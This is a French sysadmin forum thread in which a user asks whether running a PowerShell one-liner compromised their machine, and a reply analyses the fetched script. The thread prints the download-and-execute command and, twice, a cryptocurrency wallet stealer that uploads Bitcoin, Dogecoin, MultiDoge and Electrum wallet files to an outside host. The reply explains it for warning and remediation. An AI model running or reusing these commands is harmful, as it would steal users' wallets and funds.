71 votes

J'ai lancé un script PowerShell. J'ai été piraté ?

J'étais un idiot et je me suis fait avoir en lançant un script PowerShell. Quels sont les détails à ce sujet ? J'ai l'impression qu'ils ont seulement téléchargé quelques fichiers de mon système.

Mais j'ai peur qu'il y ait une porte dérobée sur mon système. Je peux vivre avec le téléchargement, mais pas avec une porte dérobée.

Attention ! Ne pas no exécuter ce script.

iex "& { $(irm

(J'ai séparé ceci en deux lignes pour éviter de l'exécuter involontairement)

powershell.software/versioncheck) } RunJob"

Attention ! Ne pas no exécuter ce script.

104voto

pigeonburger Points 1866

AVERTISSEMENT : N'EXÉCUTEZ AUCUN DES CODES CONTENUS DANS CETTE RÉPONSE. IL EST MALVEILLANT ET N'A ÉTÉ INCLUS QUE DANS UN BUT DÉMONSTRATIF.

powershell.software/versioncheck est un lien malveillant

La page à laquelle il mène se présente comme suit :

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

<head>
<style>
body {
  background-color: black;
}

</style>
</head>

 <meta http-equiv = "refresh" content = "0; url = notfound" />

Lorsque vous essayez de visiter ce lien dans un navigateur, celui-ci vous redirige rapidement loin de cette page, vers une autre page prétendant (pauvrement) que le site n'existe pas :

<meta http-equiv = "refresh" content = "0; url = notfound" />

Cependant, lorsqu'il est exécuté dans la commande complète que vous avez fournie, il reconnaît les lignes suivantes comme des commandes PowerShell :

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

C'est un voleur de portefeuille de crypto-monnaies primitif. Chaque ligne commençant par Invoke-RestMethod tente d'envoyer des données à partir d'autres portefeuilles de crypto-monnaies possibles (si vous en avez installé sur votre ordinateur) vers une page du point d'accès. http://extract.onl .

Si vous avez des portefeuilles de crypto-monnaies sur l'ordinateur, ils sont maintenant probablement compromis. Transférez tout ce qui s'y trouve vers un autre portefeuille SÉCURISÉ.

Résumer vos préoccupations :

J'ai le sentiment qu'ils n'ont téléchargé que certains fichiers de mon système.

Mais j'ai peur qu'il y ait une porte dérobée sur mon système. Je peux vivre avec le téléchargement, mais pas avec une porte dérobée.

Oui, si ces fichiers sur votre ordinateur existaient, ils ont été téléchargés. C'est tout ce que ce script semble faire cependant, il n'y a donc pas de porte dérobée persistante sur votre système.


Edit 25/10/2021 :

Depuis l'écriture de cette réponse, l'accès au code malveillant à powershell.software/versioncheck est maintenant empêché (et produit maintenant une erreur 403), mais pourrait revenir à tout moment. Il s'agit toujours d'un risque.

Edit 24/01/2022 :

Le propriétaire de powershell.software/versioncheck a remis le code malveillant en ligne. C'est toujours un risque.

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

X